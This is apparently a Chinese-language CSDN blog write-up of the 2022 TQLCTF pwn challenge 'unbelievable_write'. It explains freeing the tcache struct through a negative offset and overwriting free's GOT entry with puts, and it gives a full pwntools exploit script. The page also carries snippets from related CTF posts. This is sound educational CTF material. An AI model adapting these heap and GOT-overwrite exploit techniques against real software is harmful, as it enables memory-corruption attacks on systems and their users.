2022 TQLCTF pwn unbelievable_write

最新推荐文章于 2022-04-10 12:24:26 发布
最新推荐文章于 2022-04-10 12:24:26 发布
阅读量437 收藏
点赞数
分类专栏: CTF 文章标签: css3 css 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/123042192
版权

在这里插入图片描述
got表可以覆写
pie也没开

在这里插入图片描述三个功能

1
在这里插入图片描述申请空间 读入内容 释放空间

2
在这里插入图片描述
给释放任意一次堆的机会

在这里插入图片描述
往bss上的target写东西,写上去就成。
我们观察到
free的时候那个chunk的偏移可以输入负值
所以我们直接输入-0x290就可以free掉tcache struct

我们刚开始的想法是直接在struct中填上target处的地址,然后malloc回来改了就行
但是后来发现,因为程序中malloc之后写入内容之后会强制free,这会导致我们malloc的chunk在free的时候报错

尝试在got表中去寻找合适的malloc的位置但是也都失败了

最后决定我们可以直接劫持掉free的got表,直接劫持成puts的plt,让其free的时候仅仅是puts一下。

此时我们可以直接再次覆盖下去,但是要吧里面其他函数的got表都填好
当然我们也可以再次攻击tcache struct,这次就可以直接攻击target,改了就好。

exp

from pwn import*
from ctypes import*

lib = cdll.LoadLibrary('libc.so.6')

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()

def debug():
    gdb.attach(r, "b *0x401384\n c\n")
    pause()
    
def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

r = process("./pwn")
elf = ELF('./pwn')

def add(size, content):
    sla("> ", "1")
    sl(str(size))
    sl(content)

def free(num):
    sla("> ", "2")
    sl(str(num))

def success():
    sla("> ", "3")

payload = b"a" * 0x20 + p64(0) + p64(0x91)
add(0x70, payload)
add(0x90, b"aaaa")
free(-0x290)

payload = p64(0x11111111) * 8 + p64(0) * 20 + p64(0x404018)
add(0x280, payload)
#debug()

'''
dq offset free          ; DATA XREF: _free+4↑r
dq offset puts          ; DATA XREF: _puts+4↑r
dq offset write         ; DATA XREF: _write+4↑r
dq offset __stack_chk_fail; DATA XREF: ___stack_chk_fail+4↑r
dq offset setlinebuf    ; DATA XREF: _setlinebuf+4↑r
dq offset alarm         ; DATA XREF: _alarm+4↑r
dq offset read          ; DATA XREF: _read+4↑r
dq offset malloc        ; DATA XREF: _malloc+4↑r
dq offset open          ; DATA XREF: _open+4↑r
dq offset atoi          ; DATA XREF: _atoi+4↑r
dq offset exit          ; DATA XREF: _exit+4↑r
'''

puts_plt = elf.plt['puts']
write_plt = elf.plt['write']
read_plt = elf.plt['read']
malloc_plt = elf.plt['malloc']
open_plt = elf.plt['open']
atoi_plt = elf.plt['atoi']
exit_plt = elf.plt['exit']

add(0xd0, p64(puts_plt) + p64(0x401040))

payload = p64(0x11111111) * 8 + p64(0) * 20 + p64(0x404080)
add(0x280, payload)

add(0xd0, p64(0xdeadbeef))


success()

ti()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn入门学习
sjt670994562的博客
09-05 483
dicd_game seed种子题,需要用到共享C dll函数的ctypes from pwn import * from ctypes import * p=remote("111.198.29.45",33304) libc=cdll.LoadLibrary("libc.so.6") //加载动态链接库 p.recvuntil("me know your name: ") p....
VNCTF2022_Pwn_clear_got_WP
weixin_56434818的博客
02-14 861
VNCTF2022_Pwn_clear_got_WP 文章目录VNCTF2022_Pwn_clear_got_WP检查文件IDA查看题给elf文件利用思路exp 检查文件 RELRO半开,没有canary,开NX,没开PIE。 IDA查看题给elf文件 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[92]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp
2022 TQLCTF unbelievable_write
weixin_46483787的博客
02-23 4256
有个非预期解是打got表,使题目难度降低了很多,如果开了got不可写的话可以用largebin attack或者其他高版本libc任意地址写来做 这里放我自己用的largebin attack的方法: from re import L from pwn import * from ctypes import * from string import * from hashlib import * from itertools import product #context.log_level = 'debu
2022 TQLCTF pwn easyvm
yongbaoii的博客
02-22 630
题目很有意思,肝了不少时间。
PWN学习-ADworld刷题
WocW的博客
06-04 1622
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
CTF中的PWN——srand()/rand()漏洞(栈溢出)
壊壊的诱惑你的博客
11-16 4695
摘要: 本以为自己栈溢出学的不错了,挑战了一下攻防世界的PWN高手进阶,发现栈溢出还是有很多相关的漏洞,今天总结一下srand()函数的漏洞。 srand()/rand(): 简单介绍一下这两个函数: rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
在网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞的利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种广泛应用的数字控制技术,主要用于调节电子设备的功率或模拟信号。在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
[susctf2022-pwn] 02-happytree
weixin_52640415的博客
02-28 425
早晨才看到比赛,9点就结束。结束后作了一道题。 堆有漏洞大概有3个:UAF,写溢出,未初始化指针。其中未初始化指针是最难找了,一般想不到。不过也有个办法如果找不着前边两个就找后边这个。 题目有add,show,free三个函数。其中add有两个未初始化指针: __int64 __fastcall m1add(__int64 a1, __int64 a2, unsigned int a3) { __int64 v5; // [rsp+10h] [rbp-10h] v5 = a2; if
2022 RWCTF PWN SVME
weixin_46483787的博客
01-23 908
前言:RWCTF上的一道clone-and-pwn,一开始没搞懂clone是啥子意思,后来队里师傅扔出来一个github链接,才明白原来是直接从github上拉下来的项目,还真是real word github项目地址:https://github.com/parrt/simple-virtual-machine-C/blob/master/src/vm.c 既然是clone就意味着有源码,有了源码对于做VM题来说就大大降低了我们的逆向难度。 逆向分析 说实话其实main.c在docker文件夹里似乎也给了
TQLCTF2022 Misc WriteUp
mumuzi的博客
02-21 6606
CSDN什么玩意儿???
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8277
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7010
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5880
尝试过很多解决方案之后无果 决定研究一下它的整个流程
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 5599
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
linux 安装codeql环境 (一)基本环境搭建
yongbaoii的博客
04-10 5142
cccccccodeql
PWN 更换目标程序libc
yongbaoii的博客
12-29 4824
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值